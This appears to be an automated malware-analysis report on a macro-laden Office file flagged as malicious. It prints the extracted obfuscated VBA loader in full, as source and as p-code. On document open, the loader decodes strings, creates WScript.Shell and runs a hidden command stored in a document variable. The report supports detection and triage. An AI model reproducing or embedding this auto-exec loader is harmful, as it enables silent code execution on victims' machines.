MALICIOUS
248
Risk Score
Heuristics 10
-
ClamAV: Xls.Malware.Valyria-6700358-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-6700358-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Application.Run L_Q("55546A4F5D4E5E4F59645654") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim LV_BNR As Object: Set LV_BNR = VBA.CreateObject(L_Q("625E6E7D747B7F395E73707777")) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Public Sub Document_Open() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Public Sub Auto_Open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9354 bytes |
SHA-256: d2f42138a839b50b19a76f5d2955df01a3df9709863fdb4376095c7dfd946d7a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 22 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Sub JI_DRCSDNYKI()
T_M
End Sub
Public Function L_Q(ByVal text As String)
Dim FDI_H As String
Dim E_P As Long
For E_P = 1 To Len(text) Step 2
FDI_H = FDI_H & Chr(Asc(Chr("&H" & Mid(text, E_P, 2))) - 11)
Next
L_Q = FDI_H
End Function
Public Sub Auto_Open()
Application.Run L_Q("55546A4F5D4E5E4F59645654")
End Sub
Public Sub Document_Open()
Application.Run L_Q("55546A4F5D4E5E4F59645654")
End Sub
Public Sub T_M()
Dim LV_BNR As Object: Set LV_BNR = VBA.CreateObject(L_Q("625E6E7D747B7F395E73707777"))
Dim ACT_HD As String
ACT_HD = "4A644A4A6F524A0F4A454A4A474A4A4A4A4A261F68184A4A84274A864A4B324A4A4A5A104A4A114A3D186C67202C4A4A2BF67255484A4A764A6E524A45134D1E3D404A4A4A4A4A4A4A4A5A4A4A4A63714A65444A4A7C6B4A7C4A4A4A854A102A544A4A180D3"
Dim AHJ_WGS As String
AHJ_WGS = "B4A4A79664A3D4A16164A4A4A4A5D4A4A4A3A611B85216D4A554A534A77644A34674A380D103E494A4A804A22417C4A2C202B4A4A4A4086177C484A4A1E4A4A174A7D4A2F4A4A4A510F444A4A1E265D4A6143135A4A4A4A4A4A4A4A394A4A614A6BF34A6D50"
Dim WBN_S As String
WBN_S = "734A4E4A3B4D474A344A494753590F724A247D4A474A62724A394A547C5B7E4A7F1C4A3017148A7A4A4A4A194A854A124A4A4A694A134A4A4A4A0C6A4A384A224A4A42884A664A0E19524A54821F4A4A4A837B4A2D4A13364A3C1D881A4A4A4A4A3E4A614A4"
Dim O_DEO As String
O_DEO = "A4A114A664A4A4A4C6E4A6B4A364A743D4A4A3A5D4D344A284A528A0E5C4E6E565D2D4A744A4A5A5186644A3B284A4A1D4A5D4A31416C7F4A4A724F4C4A4A2A891F3D144A0B4B4A4A4A4A674A4A734A77844A4A4A2F264A7034266A150F4A744A4A13644A43"
Dim E_UE As String
E_UE = "4A4A4A2F496B83234A4A4A4A4A3D6E7F4A4A21527F4A2F7F4A4A128A4A4A4A19243F4A114A874A54584A506B7D3A4A11444A234D55FE6B5A4A65634A744A4A4A8A4A4E674A6D15664A31604A1F2D4A7584801E4A4A4A7B474A4A4A6D5B4A727B4A644A4A7B1"
Dim NQR_SOV As String
NQR_SOV = "94A584A684A45784A4A8A4A4A2E4A3B114A4A80894A4A4D4A824A39301B4A4A4A4A4A4A2F68894A7E4A4A1A72574D685D4A4A4A4A644A154A494A4A371839493968334A4A4A4A4A4A5E4A1A624A4A4A184A4D4A4A8422244A4A6E4A2B4A0D44191F4A356A2F"
Dim K_WT As String
K_WT = "0F4A704A114A4A4A5D4A2B4A29714A50584A1B844A424A4A4A544A4A884A584A277D4A294A4A80594A4A584A4A27244A60594A7F14824A304A864A5F3FDB4A3B7C4466534A87774A4A8A1B4A844A4A5F4A291E4A284A4A7C4A4A4A7A4A224A4A4A174A3A4A4"
Dim BV_TTR As String
BV_TTR = "A4A4A82754F1D4A4A7B194A2880266D4A624A7D861C4A73850C4A164A4A6B31817A56652412804A464A724A4A84404A335F37676F351B4A4A194A4D844A234A4A784A104A134A5B684A424A4A434A0B4A4A4A3E4A0F4A566A4A4A15213D674A4A4A4A214A3A"
Dim E_QLD As String
E_QLD = "4A2B4A4A4A4A4A6F214A354A824A4A4A4A4A4A664A507D4A45366C4A4A4A504A394A4A4A884A1026634A7F144A314A4A4A4A4A5476824A4A4A2B4A4A4F4F7A3F52674A4A4A1873404A4A0D4A4A734A1F7A4A4A2E234A6D4A1C3C1E67313C4A1E4A4B4A6F4A4"
Dim LS_S As String
LS_S = "A744A4A4A7F4A4A51764A6F4A5B5727564A154A4A16197D4A4A2A4A4A3D4A4A4A524A4A604A4D3D5D4A4A4A464A4A2E814A65216B4A684A3E2C4A4A584A444A4A4A134A4A4A7E604B38267F4A89364A77394A6084614A664A2C714A7D0F364A4A4A624A4A4A"
Dim MFG_PA As String
MFG_PA = "8A1F4A8A2A4A4D1D4A4A654A4A7E4A4A664A7E424A4A18162F470C6F4A4A327C3E4A4A4A421C244A4A6C4A2E4A313F4A4A527F4A124A654A4A654A864A4A4A4A4A6C616D294A4E544A4A2454484A1968354A4A0F4A464A5F4A464A4A52834A2F4A3779467D4A6048714A4A4A4A444A4A4A294A4A164A784A4A0C4A4A2B4A0D3C4A4A601C204A4A4F744A4A4A694A5F4A4A4A344A4A233E4A4A837C1C7D274A4A244A4A4A0D3E854A602E4A364A818A53704A4A844A"
LV_BNR.Run L_Q(ActiveDocument.Variables("AKJ2T").Value), 0, True
End Sub
Sub Workbook_Open()
Application.Run "ThisWorkbook." & L_Q("55546A4F5D4E5E4F59645654")
End Sub
' Processing file: /opt/analyzer/scan_staging/468e7f13750341b683dd063db34d7756.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 7848 bytes
' Line #0:
' Option (Explicit)
' Line #1:
' FuncDefn (Sub JI_DRCSDNYKI())
' Line #2:
' ArgsCall T_M 0x0000
' Line #3:
' EndSub
' Line #4:
' FuncDefn (Public Function L_Q(ByVal Text As String))
' Line #5:
' Dim
' VarDefn FDI_H (As String)
' Line #6:
' Dim
' VarDefn E_P (As Long)
' Line #7:
' StartForVariable
' Ld E_P
' EndForVariable
' LitDI2 0x0001
' Ld Text
' FnLen
' LitDI2 0x0002
' ForStep
' Line #8:
' Ld FDI_H
' LitStr 0x0002 "&H"
' Ld Text
' Ld E_P
' LitDI2 0x0002
' ArgsLd Mid 0x0003
' Concat
' ArgsLd Chr 0x0001
' ArgsLd Asc 0x0001
' LitDI2 0x000B
' Sub
' ArgsLd Chr 0x0001
' Concat
' St FDI_H
' Line #9:
' StartForVariable
' Next
' Line #10:
' Ld FDI_H
' St L_Q
' Line #11:
' EndFunc
' Line #12:
' FuncDefn (Public Sub Auto_Open())
' Line #13:
' LitStr 0x0018 "55546A4F5D4E5E4F59645654"
' ArgsLd L_Q 0x0001
' Ld Application
' ArgsMemCall Run 0x0001
' Line #14:
' EndSub
' Line #15:
' FuncDefn (Public Sub Document_Open())
' Line #16:
' LitStr 0x0018 "55546A4F5D4E5E4F59645654"
' ArgsLd L_Q 0x0001
' Ld Application
' ArgsMemCall Run 0x0001
' Line #17:
' EndSub
' Line #18:
' FuncDefn (Public Sub T_M())
' Line #19:
' Dim
' VarDefn LV_BNR (As Object)
' BoS 0x0000
' SetStmt
' LitStr 0x001A "625E6E7D747B7F395E73707777"
' ArgsLd L_Q 0x0001
' Ld VBA
' ArgsMemLd CreateObject 0x0001
' Set LV_BNR
' Line #20:
' Dim
' VarDefn ACT_HD (As String)
' Line #21:
' LitStr 0x00CB "4A644A4A6F524A0F4A454A4A474A4A4A4A4A261F68184A4A84274A864A4B324A4A4A5A104A4A114A3D186C67202C4A4A2BF67255484A4A764A6E524A45134D1E3D404A4A4A4A4A4A4A4A5A4A4A4A63714A65444A4A7C6B4A7C4A4A4A854A102A544A4A180D3"
' St ACT_HD
' Line #22:
' Dim
' VarDefn AHJ_WGS (As String)
' Line #23:
' LitStr 0x00CB "B4A4A79664A3D4A16164A4A4A4A5D4A4A4A3A611B85216D4A554A534A77644A34674A380D103E494A4A804A22417C4A2C202B4A4A4A4086177C484A4A1E4A4A174A7D4A2F4A4A4A510F444A4A1E265D4A6143135A4A4A4A4A4A4A4A394A4A614A6BF34A6D50"
' St AHJ_WGS
' Line #24:
' Dim
' VarDefn WBN_S (As String)
' Line #25:
' LitStr 0x00CB "734A4E4A3B4D474A344A494753590F724A247D4A474A62724A394A547C5B7E4A7F1C4A3017148A7A4A4A4A194A854A124A4A4A694A134A4A4A4A0C6A4A384A224A4A42884A664A0E19524A54821F4A4A4A837B4A2D4A13364A3C1D881A4A4A4A4A3E4A614A4"
' St WBN_S
' Line #26:
' Dim
' VarDefn O_DEO (As String)
' Line #27:
' LitStr 0x00CB "A4A114A664A4A4A4C6E4A6B4A364A743D4A4A3A5D4D344A284A528A0E5C4E6E565D2D4A744A4A5A5186644A3B284A4A1D4A5D4A31416C7F4A4A724F4C4A4A2A891F3D144A0B4B4A4A4A4A674A4A734A77844A4A4A2F264A7034266A150F4A744A4A13644A43"
' St O_DEO
' Line #28:
' Dim
' VarDefn E_UE (As String)
' Line #29:
' LitStr 0x00CB "4A4A4A2F496B83234A4A4A4A4A3D6E7F4A4A21527F4A2F7F4A4A128A4A4A4A19243F4A114A874A54584A506B7D3A4A11444A234D55FE6B5A4A65634A744A4A4A8A4A4E674A6D15664A31604A1F2D4A7584801E4A4A4A7B474A4A4A6D5B4A727B4A644A4A7B1"
' St E_UE
' Line #30:
' Dim
' VarDefn NQR_SOV (As String)
' Line #31:
' LitStr 0x00CB "94A584A684A45784A4A8A4A4A2E4A3B114A4A80894A4A4D4A824A39301B4A4A4A4A4A4A2F68894A7E4A4A1A72574D685D4A4A4A4A644A154A494A4A371839493968334A4A4A4A4A4A5E4A1A624A4A4A184A4D4A4A8422244A4A6E4A2B4A0D44191F4A356A2F"
' St NQR_SOV
' Line #32:
' Dim
' VarDefn K_WT (As String)
' Line #33:
' LitStr 0x00CB "0F4A704A114A4A4A5D4A2B4A29714A50584A1B844A424A4A4A544A4A884A584A277D4A294A4A80594A4A584A4A27244A60594A7F14824A304A864A5F3FDB4A3B7C4466534A87774A4A8A1B4A844A4A5F4A291E4A284A4A7C4A4A4A7A4A224A4A4A174A3A4A4"
' St K_WT
' Line #34:
' Dim
' VarDefn BV_TTR (As String)
' Line #35:
' LitStr 0x00CB "A4A4A82754F1D4A4A7B194A2880266D4A624A7D861C4A73850C4A164A4A6B31817A56652412804A464A724A4A84404A335F37676F351B4A4A194A4D844A234A4A784A104A134A5B684A424A4A434A0B4A4A4A3E4A0F4A566A4A4A15213D674A4A4A4A214A3A"
' St BV_TTR
' Line #36:
' Dim
' VarDefn E_QLD (As String)
' Line #37:
' LitStr 0x00CB "4A2B4A4A4A4A4A6F214A354A824A4A4A4A4A4A664A507D4A45366C4A4A4A504A394A4A4A884A1026634A7F144A314A4A4A4A4A5476824A4A4A2B4A4A4F4F7A3F52674A4A4A1873404A4A0D4A4A734A1F7A4A4A2E234A6D4A1C3C1E67313C4A1E4A4B4A6F4A4"
' St E_QLD
' Line #38:
' Dim
' VarDefn LS_S (As String)
' Line #39:
' LitStr 0x00CB "A744A4A4A7F4A4A51764A6F4A5B5727564A154A4A16197D4A4A2A4A4A3D4A4A4A524A4A604A4D3D5D4A4A4A464A4A2E814A65216B4A684A3E2C4A4A584A444A4A4A134A4A4A7E604B38267F4A89364A77394A6084614A664A2C714A7D0F364A4A4A624A4A4A"
' St LS_S
' Line #40:
' Dim
' VarDefn MFG_PA (As String)
' Line #41:
' LitStr 0x016A "8A1F4A8A2A4A4D1D4A4A654A4A7E4A4A664A7E424A4A18162F470C6F4A4A327C3E4A4A4A421C244A4A6C4A2E4A313F4A4A527F4A124A654A4A654A864A4A4A4A4A6C616D294A4E544A4A2454484A1968354A4A0F4A464A5F4A464A4A52834A2F4A3779467D4A6048714A4A4A4A444A4A4A294A4A164A784A4A0C4A4A2B4A0D3C4A4A601C204A4A4F744A4A4A694A5F4A4A4A344A4A233E4A4A837C1C7D274A4A244A4A4A0D3E854A602E4A364A818A53704A4A844A"
' St MFG_PA
' Line #42:
' Line #43:
' LitStr 0x0005 "AKJ2T"
' Ld ActiveDocument
' ArgsMemLd Variables 0x0001
' MemLd Value
' ArgsLd L_Q 0x0001
' LitDI2 0x0000
' LitVarSpecial (True)
' Ld LV_BNR
' ArgsMemCall Run 0x0003
' Line #44:
' EndSub
' Line #45:
' FuncDefn (Sub Workbook_Open())
' Line #46:
' LitStr 0x000D "ThisWorkbook."
' LitStr 0x0018 "55546A4F5D4E5E4F59645654"
' ArgsLd L_Q 0x0001
' Concat
' Ld Application
' ArgsMemCall Run 0x0001
' Line #47:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.